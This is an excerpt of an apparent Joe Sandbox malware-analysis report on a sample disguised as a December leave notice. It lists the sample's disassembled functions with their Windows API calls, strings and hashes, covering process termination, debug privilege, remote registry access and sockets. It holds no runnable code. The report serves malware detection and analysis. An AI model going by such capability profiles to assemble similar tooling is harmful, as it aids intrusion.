                                                      • Instruction ID: 5646cb8461d8d5aa40d128527a1cccb0ef7bc15b57aab3493dcb87ebf53fef95
                                                      • Opcode Fuzzy Hash: 86f348b488fbf1aa08b572a65d6b3f6bf2cf5b418c9b058328b61a2493d1dd5f
                                                      • Instruction Fuzzy Hash: F1517D70A00209EFEF24DFA4CC82FAA37B5AF48764F100518FA4697290D775EC90EB91
                                                      Function 00FC7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FC5FA6,?), ref: 00FC6EF1
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FC75CA
                                                      • _wcscmp.LIBCMT ref: 00FC75E2
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC75FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: 7c8c659b6393637936232fa39bfdd69e49fc20e52c3ee8a98d658768db6eb206
                                                      • Instruction ID: bb410ee4e2727ec4c77f0c270119184095efae334187df3dbe90075bf9442c26
                                                      • Opcode Fuzzy Hash: 7c8c659b6393637936232fa39bfdd69e49fc20e52c3ee8a98d658768db6eb206
                                                      • Instruction Fuzzy Hash: 7E511DB2A0921A5ADF51FA94DD42EDE73BCAF08320F0044AEF605E3141EA7496C9DF64
                                                      Function 00F9EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00F9EAEB
                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00F9EB32
                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00FFDC86
                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00FFDCF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 0748fbd95a424181587b853e30f24552e96b7ebbad7794ce653ae617ae21d7f0
                                                      • Instruction ID: 0c1e9a22e120653de8e73e7ee6e39e29af8c584c6344b760b4f9c911110d308c
                                                      • Opcode Fuzzy Hash: 0748fbd95a424181587b853e30f24552e96b7ebbad7794ce653ae617ae21d7f0
                                                      • Instruction Fuzzy Hash: AD411971A05280DBFF36CF28898DB3A7A96BFD5325F19040DE18B82565D679B840F721
                                                      Function 00FBB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB26C
                                                      • HeapAlloc.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB273
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FBAEF1,00000B00,?,?), ref: 00FBB288
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB290
                                                      • DuplicateHandle.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB293
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FBAEF1,00000B00,?,?), ref: 00FBB2A3
                                                      • GetCurrentProcess.KERNEL32(00FBAEF1,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB2AB
                                                      • DuplicateHandle.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB2AE
                                                      • CreateThread.KERNEL32(00000000,00000000,00FBB2D4,00000000,00000000,00000000), ref: 00FBB2C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 5a6703e4e44e259c425a688dd6490f0e79d684aa81da35a5c708db495b2a84ab
                                                      • Instruction ID: dbe0a2ccc8f62a7d9f9cfc98a37d2f3d0ae6ea8eafdd084c04a925feebdd46f5
                                                      • Opcode Fuzzy Hash: 5a6703e4e44e259c425a688dd6490f0e79d684aa81da35a5c708db495b2a84ab
                                                      • Instruction Fuzzy Hash: 7D01BBB5240304BFE721ABE5DC49F6B7BACEB88711F018411FA45DB195CA75D800CB70
                                                      Function 00FDC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 6dfeb72ec102393d3636b0ad8a01fa6f944ce8a60a56d5d000d0d9e47fa18227
                                                      • Instruction ID: 0c9c3e718189f29c92ff056e9c1b08d497fea100d85a7950cd5c446d74d2dd65
                                                      • Opcode Fuzzy Hash: 6dfeb72ec102393d3636b0ad8a01fa6f944ce8a60a56d5d000d0d9e47fa18227
                                                      • Instruction Fuzzy Hash: 95E19371E0021AABDF14DFA4D981BAE77B6EF48314F18402AE945AB381D774ED41EB90
                                                      Function 00FDBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 3c47c663722b52ba51b7a43027658f1ff849259c47e4fb5bab7adfddc4fc0d56
                                                      • Instruction ID: 42eac9da0b4d68a20be0e6ae2e6c0c953a3d79f8d22b5bd2a8d5f70abc46c82e
                                                      • Opcode Fuzzy Hash: 3c47c663722b52ba51b7a43027658f1ff849259c47e4fb5bab7adfddc4fc0d56
                                                      • Instruction Fuzzy Hash: 60918F71E00219EFDF24CF95C844FAEBBBAEF85720F15815AF505AB280DB709940DBA0
                                                      Function 00F886C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: Q\E$[$\$\$]$^
                                                      • API String ID: 2102423945-1026548749
                                                      • Opcode ID: 955ed95200db6c73e819dee0b1a4991e8fc10efdda5a0e37686df8272ddb66a9
                                                      • Instruction ID: c5dfee790623113712ca44c37b08821e89ee5faff6d2c49f34eefca234dff4e1
                                                      • Opcode Fuzzy Hash: 955ed95200db6c73e819dee0b1a4991e8fc10efdda5a0e37686df8272ddb66a9
                                                      • Instruction Fuzzy Hash: 88516171E002099BDF24EF98C8817EDB7B2BF94324F388166D914A7351E7709D85EB81
                                                      Function 00FE9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FE9B19
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00FE9B2D
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FE9B47
                                                      • _wcscat.LIBCMT ref: 00FE9BA2
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FE9BB9
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FE9BE7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 8fc20c3a2e10a5d2f3847bab145f51746405328c875f0dfe7f813dc138d0cae7
                                                      • Instruction ID: af8521eeacd17cf5f3a8d37d9bb00f3efd5f2cf65664f9675b062118a15a07bd
                                                      • Opcode Fuzzy Hash: 8fc20c3a2e10a5d2f3847bab145f51746405328c875f0dfe7f813dc138d0cae7
                                                      • Instruction Fuzzy Hash: BA41D271904348ABEB219FA4DC85BEE77B8EF48360F10042AF585E7282D7B59D84DB60
                                                      Function 00FE172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FC6554
                                                        • Part of subcall function 00FC6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FC6564
                                                        • Part of subcall function 00FC6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FC65F9
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FE179A
                                                      • GetLastError.KERNEL32 ref: 00FE17AD
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FE17D9
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FE1855
                                                      • GetLastError.KERNEL32(00000000), ref: 00FE1860
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE1895
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: d39de889c11c227609ad53f1ffe68a599c85373d612897d183b38cfd035dab4b
                                                      • Instruction ID: f78a484875d0e7d7a83b66114080faed3acddb1ec7f433e25855ce3c143957f9
                                                      • Opcode Fuzzy Hash: d39de889c11c227609ad53f1ffe68a599c85373d612897d183b38cfd035dab4b
                                                      • Instruction Fuzzy Hash: 1641BE72A00201AFDB16EF95CCA6FAD77A5BF44710F04805DF9069F282DB79A900EB90
                                                      Function 00FC5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00FC58B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 99e74e970578790dd21bc480598c54baf475654c957589b3d887825655053108
                                                      • Instruction ID: 0d489986c0597929f9d33b3b9c706f68d7cc0a7e0ea2355f1fcdbdcfff9ca2c1
                                                      • Opcode Fuzzy Hash: 99e74e970578790dd21bc480598c54baf475654c957589b3d887825655053108
                                                      • Instruction Fuzzy Hash: 7111EB76609B43BEE7155A559DC3FAA339CEF16B30B20003EF540E92C1EB64B9806264
                                                      Function 00FCA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00FCA806
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: be4419ea23f14f0d6539a06fe79cf2504b17490e05b403865498e584d33d6c0f
                                                      • Instruction ID: 5b8a7e5650e95ac573b005be5d77755fd06892cda749807dcf2afc41e60c58a6
                                                      • Opcode Fuzzy Hash: be4419ea23f14f0d6539a06fe79cf2504b17490e05b403865498e584d33d6c0f
                                                      • Instruction Fuzzy Hash: E2C19E75A0420ADFDB14CF98D682BAEB7F4FF08319F20406DE646E7281D739A941DB91
                                                      Function 00FC6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FC6B63
                                                      • LoadStringW.USER32(00000000), ref: 00FC6B6A
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FC6B80
                                                      • LoadStringW.USER32(00000000), ref: 00FC6B87
                                                      • _wprintf.LIBCMT ref: 00FC6BAD
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FC6BCB
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00FC6BA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: b8caaeb14dc1ba08275ed4d8e9caf608e42d3539aa0c6c99dd8e3701e9171ff9
                                                      • Instruction ID: b46a3c1c036a41120b93c3fedf3b4628261961789c283a277bb54f63942948aa
                                                      • Opcode Fuzzy Hash: b8caaeb14dc1ba08275ed4d8e9caf608e42d3539aa0c6c99dd8e3701e9171ff9
                                                      • Instruction Fuzzy Hash: C20112F6900218BFE711A7D49D89EE6776CE708305F004495B785D6045EA799E844B71
                                                      Function 00FE2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE2BF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharConnectRegistryUpper
                                                      • String ID:
                                                      • API String ID: 2595220575-0
                                                      • Opcode ID: c1583c40aa87741b92d811f12e1b5cf129ca84ad09d9fbb9f08790c028d54cc5
                                                      • Instruction ID: ac11f6e83bcaa17c7882915e0448ccf4221065e0d8da357b43595a9218bb45c1
                                                      • Opcode Fuzzy Hash: c1583c40aa87741b92d811f12e1b5cf129ca84ad09d9fbb9f08790c028d54cc5
                                                      • Instruction Fuzzy Hash: E4919B31604201AFCB11EF55CC95B6EB7E9FF88320F04881DF99A97291DB39E905EB52
                                                      Function 00FD95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • select.WSOCK32 ref: 00FD9691
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD969E
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00FD96C8
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FD96E9
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD96F8
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00FD97AA
                                                      • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0101DC00), ref: 00FD9765
                                                        • Part of subcall function 00FBD2FF: _strlen.LIBCMT ref: 00FBD309
                                                      • _strlen.LIBCMT ref: 00FD9800
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                      • String ID:
                                                      • API String ID: 3480843537-0
                                                      • Opcode ID: acdc9c2126f44df6037e6ffb2bef51a64104938ed09c464f13869342c0bd2319
                                                      • Instruction ID: de51e9e7f78f94520894065e569b573b57783aa5281aef1f2d4c2425a143c7bf
                                                      • Opcode Fuzzy Hash: acdc9c2126f44df6037e6ffb2bef51a64104938ed09c464f13869342c0bd2319
                                                      • Instruction Fuzzy Hash: 80810032508240ABC710EFA4CC85F6BB7E9EFC4714F14462EF5559B291EB74D900EBA2
                                                      Function 00FAA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __mtinitlocknum.LIBCMT ref: 00FAA991
                                                        • Part of subcall function 00FA7D7C: __FF_MSGBANNER.LIBCMT ref: 00FA7D91
                                                        • Part of subcall function 00FA7D7C: __NMSG_WRITE.LIBCMT ref: 00FA7D98
                                                        • Part of subcall function 00FA7D7C: __malloc_crt.LIBCMT ref: 00FA7DB8
                                                      • __lock.LIBCMT ref: 00FAA9A4
                                                      • __lock.LIBCMT ref: 00FAA9F0
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01036DE0,00000018,00FB5E7B,?,00000000,00000109), ref: 00FAAA0C
                                                      • EnterCriticalSection.KERNEL32(8000000C,01036DE0,00000018,00FB5E7B,?,00000000,00000109), ref: 00FAAA29
                                                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 00FAAA39
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 1422805418-0
                                                      • Opcode ID: 48b8712d24759db2445ac87f5fe8a6cea5fbedbe351826480b76f98970741e57
                                                      • Instruction ID: 5bdc49edd02f50e81d374c1bd761bcf7a2039ece5fbb755960d68b4b08bb8296
                                                      • Opcode Fuzzy Hash: 48b8712d24759db2445ac87f5fe8a6cea5fbedbe351826480b76f98970741e57
                                                      • Instruction Fuzzy Hash: 8B4134F1E00701DBEB209FA8DA8479CB7F0AF06334F148218E565AB2C1D77D9849DBA1
                                                      Function 00FE8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FE8EE4
                                                      • GetDC.USER32(00000000), ref: 00FE8EEC
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FE8EF7
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FE8F03
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00FE8F3F
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FE8F50
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FEBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00FE8F8A
